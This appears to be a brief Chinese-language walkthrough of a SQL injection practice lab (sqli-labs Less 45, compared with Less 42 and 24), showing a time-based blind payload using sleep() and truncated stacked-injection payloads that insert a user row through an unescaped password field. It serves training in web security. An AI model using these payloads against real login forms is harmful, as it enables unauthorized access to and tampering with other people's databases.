和Less44一个名字
测试一下,发现是')闭合的
login_user=&login_password=1') or sleep(0.1)#
那就是没有错误显示的less42
login_user=&login_password=1');insert into users(id,username,password) v...
Forgot your password?
New User click here?
看源码,可以发现和less 24不同的一点在于password字段没有进行转义处理
那就对password字段进行堆叠注入
login_user=&login_password=1';insert into users...